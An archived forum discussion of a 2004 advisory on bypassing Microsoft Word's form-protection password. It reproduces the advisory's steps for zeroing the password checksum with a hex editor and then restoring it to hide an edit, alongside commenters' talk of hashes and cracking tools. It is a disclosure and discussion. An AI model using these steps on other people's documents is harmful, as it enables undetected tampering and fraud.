Microsoft Word Forms Passwords Hacked

An anonymous reader notes: "SecurityFocus has published a hack that can be used to unlock Microsoft Word documents that have been password protected. The 'secure' file can easily be edited and the original password re-inserted, removing any trace of the modification. A ZDNet UK article says Dell uses password protected Word files to send quotes, which could make for a messy legal battle." This feature, known as 'Password to Modify', is not the password protection on the document itself, just the protection that restricts unauthorized editing of the file. This hack allows someone to download such a file, edit it, and restore the password...effectively allowing changes to the file to go potentially unnoticed.

Nothing New

[digitalvengeance]

There have been utilities to obtain Word passwords for quite a while. I've tested mine on Office 2000 and XP protected documents and had great success.

What's odd: The password returned by my tool of choice is not the same as the one actually stored - but when I enter this new password OR the original password into Word, the document is successfully unprotected. Some sort of odd math that makes more than one password work?
Example - I protected both a Word 2000 and Word 2002 document with the password "test" then ran them through my cracker. The cracker returned the password "QFQDOBCTGLHGEE" virtually instantly for both documents. Oddly enough, this new unusual password successfully unlocked both Word documents using Tools > Unprotect Document. Subsequent testing reveals that the original password will also unprotect the document.

So, if such passwords can easily be bypassed anyway - what does this really change?

I should note that I'm using a Passware product called Office Key.

This crack just takes what has been commercially available for quite some time and moves it into the public arena.

Josh

Re:Nothing New

[Stavr0]

The word doc doesn't store the password, but a one-way checksum.

The passware product merely computes a password that matches the checksum found in the word doc.

Re:Nothing New

[Violet+Null]

Word probably uses a hash function to test the password (just like Linux doesn't store passwords, but hashes, in /etc/password). There's some function, you put the "password" in, it spits a hash out, and that is compared to the stored hash.

Hashes are more secure than storing the password, because they tend to be pretty one way -- it's trivial to get a hash from a password, but much less trivial to get a password from the hash.

However, hashes can collide; the smaller the hash returned, compared to the possible keyspace, the more likely this is. For instance, if I have a hash function that returns a one byte hash that I use to hash my password, then there is a 1/256 chance that _any_ gibberish I send in will return the same hash, and thus match.

Microsoft is probably using a very small hash, and your "tool of choice" probably just brute forces the thing until it finds a match.

If your tool of choice continued through the keyspace, it would inevitably come up with test, too.

Re:Nothing New

[GoofyBoy]

>Some sort of odd math that makes more than one password work?

Really really simple dumbed down of an explination of what could be happening.

I set the password to "011". Word takes the sum of the digits (0 + 1 + 1 = 2) and stored the result.

When I want to unlock it Word takes the password I enter and sums the digits and sees if they match with the stored result from step 1. So "011" would work and so would "020" and "110".

Of course it would be more complex math. Hope this gives you a bit understanding how it could happen.

Re:Nothing New

[b-baggins]

Word document password protection has always been a joke. It's total cake to bypass it.

1. Open a new blank Word document.

2. Insert the protected document into the new document using the Insert command. You will NOT be asked for the password.

3. You now have the protected document, complete with formatting, content, etc., but with no password protection as your new document.

Re:Nothing New

[pegr]

Word document password protection has always been a joke. It's total cake to bypass it.

1. Open a new blank Word document.

2. Insert the protected document into the new document using the Insert command. You will NOT be asked for the password.

3. You now have the protected document, complete with formatting, content, etc., but with no password protection as your new document.

Nope, not since Office 98. Since Office 98, password protected docs are truly encrypted. It does indeed ask you for the password when you insert it.

And I just noticed that, in Office 2003 anyway, you can hit the "Advanced" tab and choose what kind of encryption you want (RSA, etc.), as well as bit length. Pretty cool!

Re:Nothing New

(just like Linux doesn't store passwords, but hashes, in /etc/password)

Just a brief nitpick here, but most Linux systems store password hashes in /etc/shadow, with /etc/passwd holding the rest of the info for the user accounts. Everyone can read /etc/passwd (and needs to, to get user names from UIDs), but only root (and stuff like getty that checks passwords, running as root) can read /etc/shadow. You can set it up to use the old-school style and hold hashes in /etc/passwd, but it's generally frowned upon.

Re:Nothing New

[pegr]

OK, replying to your own post is lame, but here are the encryption types available under Word 2003:

Weak Encryption (XOR)
Office 97/2000 Compatible
RC4, Microsost Base Cryptographic Provider
RC4, Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
RC4, Microsoft DH SChannel Cryptographic Provider
RC4, Microsoft Enhanced Cryptographic Provider v1.0
RC4, Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
RC4, Microsoft RSA SChannel Cryptographic Provider
RC4, Microsoft Strong Cryptographic Provider

I especially love the XOR encryption! (At least they call it weak...) For the other types, you can spec a bit length between 40 and 128 bits. Now I'm not sure what MS does to "enhance" these encryption types, but there it is, for what it's worth... (I wonder if Whitfield knows his name is contained within MS Word? ;)

Re:Nothing New

[Feyr]

this hack doesn't even use brute force. they just found the bytes in the word file where the password is store.

zero'ing those bytes with an hex editor allow you to modify the document password-free. you then replace the original hex in the bytes you modified to "reactivate" the protection.

Re:Nothing New

[Suppafly]

If the original and generated password can both unlock the file ... does that guarantee that locking the file with the generated password will allow it to be unlocked with the original?

Yes. But that is not what the article is about anyway.

Re:Nothing New

[saforrest]

If they had used a real one-way function, such as MD5, it would not be possible to come up with another value that hashed to the same result.

Uh, you're confusing two things.

A one-way function is simply some function which is not one-to-one. For example, consider the length function L which maps words to integers, e.g. L("bob")=3, L("A")=1.

It's not possible, given an integer n, to find the specific word that mapped to n, simply because there isn't an unique one. This is what makes it one-way.

The fact that there are multiple possible passwords for this Word document is proof that it is a one-way function.

What you're talking about is the ease of finding some element of the preimage of a given hash, which is a separate concept. MD5 is good because for some given value, it's really hard to find anything which hashes to that value, not because it's somehow 'more one-way'.

In fact, the most one-way function of all is a constant function, which is obviously totally useless for authentication.

Re:Nothing New

[Bronster]

Just a brief nitpick here, but I think that most versions of getty actually spawn login, which is what reads the shadow file. But they can only read the shadow file as they have root privileges, there is no "and stuff like...". Just root. You'll note that passwd can no longer be used by normal users if you take away its SUID 0 status.

And right back at you. Have you ever actually looked at the file, or are you just talking out of your arse?

brong@dariat~>ls -la /etc/shadow
-rw-r----- 1 root shadow 1320 Dec 28 10:51 /etc/shadow

This is Debian GNU/Linux - but I remember similar things on BSD and other U*IX like OSen that I've used. Shadow group is a concept that's not exactly new, and it means that tools which only read, and should never write, the password file can be partitioned off where they can't do much damage.

Slashdot does need a 'full of shit' moderation.

The 'passwd' command on the other hand needs to write the password file, and hence needs root privs.

Oh, and a good reason not to use LDAP (and I speak from experience here) is that it leads to single points of failure. We've switched to using centrally managed /etc/passwd and /etc/shadow synchronised out to all machines by the configuration management tools. Far fewer messy failure modes.

If you want to come up with an OS where there isn't a shadow group for /etc/shadow, feel free - but I haven't seen it anywhere I've had to care.

RTFA... It's hilarious

[h4rm0ny]

According to Microsoft, the password protection feature on Word is not intended to be secure, but should be regarded as a means to protect documents against accidental modification. I use Word and don't ever recall being advised of this, but then I suppose the EULA does warn users never to actually rely on the software for anything important.

I never expected the protection in Word to be anything special, but sometimes (as shown here by Dell) it's better to have no security than false security because that way you take greater care.

But for those of you who never RTA, here is what was the highlight for me:

1.) Open a protected document in MS Word
2.) Save as "Web Page (*.htm; *.html)", close Word
3.) Open html-document in any Text-Editor
4.) Search "" tag, the line reads something like that: ABCDEF01

Re:RTFA... It's hilarious

[(eternal_software)]

Uhhh.. what about the rest of it? You then have to take that tag, open up a hex editor, reverse it, find the bytes, and null them out.

I mean, it's not rocket science, but that was some creative editing on your part to make it look ridiculously easy.

One Way function

[nuggz]

Passwords can use a one way function.
Take the source string, do a bunch of 'stuff' to it, stuff that isn't easy to undo.
You can throw out some data too.

You end up with a new string, but since you threw out some information, you end up unable to reverse it.

Even if you know the end result, and the formula, you can't guess the password. You'd have to brute force it.
With slow computers, this was a very good obstacle. Now we use fancier algorithms, and it is still okay.

I'm not a math guy, go read crypto books if you want the 'real' explanation

Re:No messy Dell battle

[vasqzr]

Come to think of it, I can't think of a real position where this could be a problem. What would someone do, host protected .doc's on a public server, and hope no one hacks into the server putting back the password-modified .doc? Anyone have a real world example?

You've obviously never been in the real world.

To someone like your or I, Word is simply a word processing program. But, to office workers across the country....

Here's a list of things I've seen people use MS Word for:

Spreadsheet. Hit tab, enter a value, add them up by hand. Excel is 'too confusing'

Creating GIANT tables and using them for inventory, rather than an Access database

Creating a 3,000 page document and keeping time/attendance records for ~ 250 employees. And wonder why it takes 10 minutes to load, and 10 minutes to save, doesn't scroll right....

The article is troll-ish

[_RiZ_]

I work with Dell for our workstation and laptop purchases and not once in the last 3 years have they sent me a quote in a Word document.

They have a system that links the quote with your customer ID and gets generated as an HTML file which gets emailed to you. All automagically.

To whom ever that thought they could change a word document quote and expect to get that price, I got some beach front property to sell you in Kansas. Silly fool.

Microsoft already knew

[JUSTONEMORELATTE]

It's old news -- that's why Microsoft prefers PDF for the really important stuff.

Re:Oh, this bodes well.

[zdislaw]

I wondered exactly the same thing. For about three seconds. The I RTFA.

2003-11-27, 10:30 UTC Microsoft notified to: secure microsoft com

2003-11-27 confirmed receipt from: secure microsoft com

2003-12-03 Note from Microsoft, Form protection "is not intended as a full-proof protection for tampering or spoofing, this is merely a functionality to prevent accidental changes of a document", request additional time to update Microsoft Knowledge Base article.
Targetting beginning of January 2004 for release of this advisory.
from: "Magnus"

2003-12-08 Microsoft has already released the KB article (or added a warning to an existing article). Read the KB article at http://support.microsoft.com/?id=822924
from: "Magnus"

Come on now...

[Kevin+Stevens]

Was this ever really meant to be really truly secure? "security" features like that have always been lame at best and equivalent to luggage locks. These passwords have always been susceptible to brute force attacks. Anyone really serious about keeping documents safe puts them into a source control program. There are many ways to pick at MS's security, this is not one of them. But if you are trusting these measures for really secure documents, I highly suggest you get your valuables out of the pink plastic safe you won at the county fair last year.

Re:Come on now...

[p3d0]

RTFA. This is not a brute-force attack. It's an inherent dumbness of their password scheme.

Full Article

[Athrawn17]

To: BugTraq
Subject: Microsoft Word Protection Bypass
Date: Jan 2 2004 10:51AM
Author: Thorsten Delbrouck-Konetzko
Hi all,
Microsoft Word provides an option to protect "forms" by password. This is
used to ensure that unauthorized users cannot manipulate the contents of
documents except within specially designed "form" areas. This feature is
also often used to protect documents which do not even have form areas
(quotations/offers etc.).
This form protection can easily be removed without any additional tools
(apart from a hex-editor).
Please find the full advisory attached.
best regards, /tdk
Thorsten Delbrouck
Chief Information Officer
Guardeonic Solutions AG
Rosenheimer Str. 116
D-81669 Munich
Security Advisory #01-2004
Advisory Name: Microsoft Word Form Protection Bypass
Release Date: 2004-01-02
Affected Product: Microsoft Word
Platform: Microsoft Windows, probably Apple Mac OS
Version: tested on 2000, 2002 (XP), 2003,probably other versions vulnerable as well
Severity:Document ("Form") protection can be easily removed
Author:Thorsten Delbrouck
Vendor Communication:2003-11-27, 10:30 UTC Microsoft notified to: secure microsoft com
2003-11-27 confirmed receipt
from: secure microsoft com
2003-12-03 Note from Microsoft, Form
protection "is not intended as a full-proof protection for tampering or spoofing, this is
merely a functionality to prevent accidental
changes of a document", request additional
time to update Microsoft Knowledge Base
article. Targetting beginning of January 2004 for release of this advisory.
from: "Magnus"
2003-12-08 Microsoft has already released the KB article (or added a warning to an existing article). Read the KB article at http://support.microsoft.com/?id=822924
from: "Magnus"
Overview:
Word provides an option to protect "forms" by password. This is used
to ensure that unauthorized users can not manipulate the contents of
documents except within specially designed "form" areas. This feature
is also often used to protect documents which do not even have form
areas (quotations/offers etc.).
(Word users will find this option on the "Tools" menu, entry "Protection", select "Forms" there and provide a password)If a Word document is protected" by this mechanism, users cannot select parts of the text or place the cursor ithin the text thus they cannot make any changes to the document.
Description:
When saving protected Word-documents as html-files, Word adds a
"checksum" of the password (enclosed in a proprietary tag) to the
code. The checksum format looks somewhat like CRC32 but currently
there are no further details available. The same checksum can be
found within the original Word document (hexadecimal view). If this
"checksum" is replaced by 0x00000000 the password equals an empty
string.
Example:
1.) Open a protected document in MS Word
2.) Save as "Web Page (*.htm; *.html)", close Word
3.) Open html-document in any Text-Editor
4.) Search "" tag, the line reads something like that: ABCDEF01
5.) keep the "password" in mind
6.) Open original document (.doc) with any hex-editor
7.) search for hex-values of the password (reverse order!)
8.) Overwrite all 4 double-bytes with 0x00, Save, Close
9.) Open document with MS Word, Select "Tools / Unprotect Document"
(password is blank)
Variation:
If the 8 checksum bytes are replaced with the checksum of a known
password it should be fairly easy to unprotect the document, make any
necessary changes, save, close and reset the password to the original
(unknown!) password by simply restoring the original values. Document
changed without even knowing the password. Nasty.
(Note: Take care to get file properties (author, organisation,
date/time etc.) right.)
Solution:
No solution is currently available. Do not rely on the "Protect
Forms" mechanism to protect a Word document against changes.
Credits:
Magnus from the Microsoft Security Response Center for his fast
responses and for showing a decent sense of humour. :-)

Re:Other Variants

[pegr]

If I recall, openoffice/staroffice can open "encrypted" Word and Excel documents without the requirement of a password. I know this used to work for older versions...

Not since Office 98...

Tags fixed.

Full thing.

-----------------------

1.) Open a protected document in MS Word
2.) Save as "Web Page (*.htm; *.html)", close Word
3.) Open html-document in any Text-Editor
4.) Search "<w:UnprotectPassword>" tag, the line reads something like
that: <w:UnprotectPassword>ABCDEF01</w:UnprotectPassword >
5.) keep the "password" in mind
6.) Open original document (.doc) with any hex-editor
7.) search for hex-values of the password (reverse order!)
8.) Overwrite all 4 double-bytes with 0x00, Save, Close
9.) Open document with MS Word, Select "Tools / Unprotect Document"
(password is blank)

Easy to crack manually

[pmann79]

I've modified "protected" Word documents by opening them in Notepad and scrolling through the last few lines until I find a string of plain text that looks like a password (i.e. isn't a username or Word setting). Although this takes a bit more time for the searching, there's no need to modify the password at all.

Checksum == modification check

[ryen]

>removing any trace of the modification.

modification can be checked using a checksum of the original and suspect files. that is.. if the user knows how to obtain the checksums.

Re:Just how far should they go?

[Coryoth]

I saw a good point the other day that US export laws on cryptography were fairly stupid when you consider that other countries have the skills/intelligence to develop strong cryptography outside the US in the first place. For example, RSA was originally developed in the UK.

At GCHQ, where is was kept under lock and key, and no one knew about it until long after Rivest Adleman and Shamir had published their paper.

Jedidiah

Re:Weren't .ZIP files worse?

[tuffy]

pkzip files have always had genuine data encryption (the sort that isn't viewable with a hex editor), but that encryption has traditionally been quite weak. I'm unsure if the new schemes are any better, but I doubt many people use that aspect of pkzip files anyway.

Re: Just how far should they go?

[Kjella]

So long as we ride the Moore Curve, overkill degrades to underkill at a rate of about one bit per 18 months. So if you want your document to be secure in perpetuity, you'd better use a lot of bits.

Take something like 256 bits, which is quite commonly available, and you'll see that brute forcing it requires you to turn each atom on earth into a computer, and compute with each of the atoms of the earth (2^171 atoms) at 1 THz (2^40) for 1 million years (2^45) in order to brute force *one* key.

Now, if that is too unsecure for you, I recommend you seek professional help. Fast.

Kjella

Re:Can't have it both ways

[Anonym0us+Cow+Herd]

I don't know what "both ways" you're talking about.

I can assure you it is possible to have secure encryption, secure digital signatures without DRM.

GPG and PGP are examples of both, without DRM.

Try reading the book Applied Cryptography.

It would be most certianly possible to encrypt a document using a password, using a secure encryption mechanism, such that it cannot be decrypted without the password.

Similarly, it is possible to take a secure (i.e. MD5) hash of a document, and then compare that document if it comes back to you to be sure it is the original. Applied Cryptography details numerous protocols for conducting business, signing documents, and many other useful things. All securely. All without DRM.

some forms of XOR are not weak

[js7a]

Remember, XOR is used for one time pads, the strongest form of encryption.

XOR against a passphrase is weak.

XOR against a repeating secure (irreversible) hash of the password is technically weak but in practice very strong unless the message is dozens of times longer than the hash.

XOR against a successive concatination of secure hashes is strong, fast, and simple. There is no reason to believe 3DES is any stronger. Plus, it's the same algorithm for encrypting and decrypting. Pseudocode:

1. secureXOR(input[], key):
2. pad = SecureHash(key); /* e.g. MD5 or SHA[1-n] */
3. length = LengthOf(SecureHash); /* e.g. 128 for MD5 */
4. ptr = 0;
5. output[ptr..ptr+length] = input[ptr..ptr+length] XOR pad;
6. if (ptr > sizeof(input)) return(output[]);
7. pad = SecureHash(pad);
8. goto 4;

Re:the article was a joke

[DaCool42]

There is a thread about this vulnerability on bugtraq. I would suggest you go there for first hand info.

Non-linear, not one-way

[IncohereD]

A one-way function is simply some function which is not one-to-one. For example, consider the length function L which maps words to integers, e.g. L("bob")=3, L("A")=1.

Think this one through. The algorithms used to sign PGP/GPG messages are one way. The reason being is that it's hard to come up with something else that maps to the same value.

Using your length function example, considering the two e-mails from Alice

"I love Bob"

"I hate Bob"

Would both parse to 1 4 3. Which means Eve could flip Alice's feelings for Bob, without invalidating the signature.

That, my friend, is a crappy 'one-way' function. So crappy, that's it's not really one-way.

The "multiple inputs give the same output" thing just means it's non-linear. And all that that implies.

Re:DRM in Office 2003 is unaffected

[cookd]

Excellent point. The "lock" that has been broken is just that -- a lock, designed such that those who only use Word to edit the file can't edit the file without the password. This is the same as saying that a lock on a door is only effective against those who only come in through the doorway. The file isn't encrypted in any way, just locked. It is just a flag that tells Word to not let you view or edit the file until you've provided the password.

There have always been a lot of ways around this lock. First, you can always generate a matching password (equivalent to picking the lock on a door). Or you can just zero out the password field in the file (the point of the "Security Advisory" linked in the article), which is like taking a door off of its hinges (I'm nearing metaphor breakdown here, but you'll just have to deal with it). Or you can just use some other editor (a hacked version of Word, a hex editor, or an Open Source editor) that lacks the programming to enforce the lock flag. That would be like ignoring the door and going for an open window or the back door or something. (Metaphor over, you can open your eyes now.)

Remember that the file format was designed back when any non-trivial encryption was evil, and exporting it was considered espionage. Also remember that Word is targeted at students, teachers, and soccer moms just as much as it is targeted at CEOs and lawyers. The average Joe is satisfied with the trivial lock, and in fact would probably prefer less security, since that means if he/she is careless and forgets the password, the document can still be recovered (cost/benefit analysis: potential for damage if the document is opened by an outsider * probability that it will be opened by an outsider --versus-- potential for damage if my password is lost * probability that I will lose my password). Most people aren't protecting documents against evil government agents -- usually it is just their little brother or the guy in the next office that they need to keep out.

Anyway, the bottom line is that this was never meant to be a safe deposit box, not even barbed wire and chain link. It is a simple lock, and just as a good screwdriver or a pair of bolt cutters can get you past a lock in no time, a real computer person would never even blink if confronted by something like this, and Microsoft never advertised it as anything else.

On the other hand, they are now advertising new encryption and protection features that are the real thing. This time, they are making a strong claim of decent encryption: if you don't have the appropriate certificate, you're going to have a very hard time opening this document. Of course, once it is opened, the "Do Not Forward" or "Do Not Save Unencrypted" flags are once again just trivial locks, but that is a separate issue -- you have to open the document before you could do that.